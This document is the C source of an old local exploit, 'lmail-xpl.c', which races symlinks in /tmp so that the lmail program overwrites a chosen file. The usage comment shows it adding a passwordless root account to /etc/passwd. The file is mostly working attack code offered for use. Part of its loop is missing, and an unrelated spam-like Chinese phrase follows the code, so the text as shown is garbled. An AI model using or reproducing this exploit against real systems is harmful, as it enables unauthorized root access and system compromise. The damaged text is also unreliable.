/* For more information see http://www.securityfocus.com/archive/1/195022 */ /* lmail-xpl.c * * Quick hack to exploit lmail * * Simply run it with the file you want to create/overwrite * and the data you wish to place in the file. * * Example: * * $ gcc -g -Wall lmail-xpl.c -o lmail-xpl * $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash * * Then login as owned... etc.. * * by Charles Stevenson * * July 04 2001 * * shoutz b10z */ #include #include #include #include #define TEMPFILE "/tmp/ez.XXXXXX" #define BRUTE 128 void usage(char*); int main(int argc, char **argv){ char tempfile[128] = TEMPFILE; int fd, i; pid_t pid; char temp[512]; if (argc < 3){ usage(argv[0]); } if((fd = mkstemp(tempfile))==-1){ fprintf(stderr, "Error creating %s!\n",tempfile); exit(1); } /* begin lazy slacker coding */ fprintf(stderr, "lmail-xpl.c by core (c) 2001\n"); fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile); /* backup old file */ sprintf(temp, "/bin/cp %s %s", argv[1], tempfile); system(temp); /* set the date/time */ sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile); system(temp); pid = getpid(); fprintf(stderr, "> creating a lot of symlinks\n"); for (i=0;i cleaning up\n"); sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*"); system(temp); fprintf(stderr, "All done. Enjoy!\n"); return 0; } void usage(char *name){ fprintf(stderr, "usage: %s \n", name); exit(1); }

亚洲欧美在线